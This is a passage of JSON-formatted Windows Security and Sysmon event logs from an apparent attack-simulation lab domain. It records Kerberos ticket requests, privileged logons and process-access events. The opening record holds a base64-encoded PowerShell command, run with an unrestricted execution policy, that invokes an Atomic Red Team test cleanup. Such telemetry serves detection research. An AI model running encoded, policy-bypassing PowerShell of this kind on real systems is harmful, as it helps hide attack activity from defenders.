WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20D7-5F25-0000-0020ADE10800}","LogonId":"0x8e1ad","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{41C8662E-20D7-5F25-0000-001081F10800}","ParentProcessId":"3496","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220649,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220650,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{0D8FBDD6-75E6-6343-98AC-BC4E746D737F}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{0D8FBDD6-75E6-6343-98AC-BC4E746D737F}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220651,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{0D8FBDD6-75E6-6343-98AC-BC4E746D737F}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{0D8FBDD6-75E6-6343-98AC-BC4E746D737F}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220652,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x90792\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{0D8FBDD6-75E6-6343-98AC-BC4E746D737F}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x90792","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{0D8FBDD6-75E6-6343-98AC-BC4E746D737F}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220653,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x90792\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x90792","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5632,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.299\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-001081F10800}\r\nSourceProcessId: 3496\r\nSourceThreadId: 760\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D8-5F25-0000-001089080900}\r\nTargetProcessId: 1052\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFD152E8890)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.299","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-001081F10800}","SourceProcessId":"3496","SourceThreadId":"760","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D8-5F25-0000-001089080900}","TargetProcessId":"1052","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFD152E8890)","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5633,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.299\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D8-5F25-0000-001089080900}\r\nTargetProcessId: 1052\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.299","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D8-5F25-0000-001089080900}","TargetProcessId":"1052","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5634,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5635,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5636,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 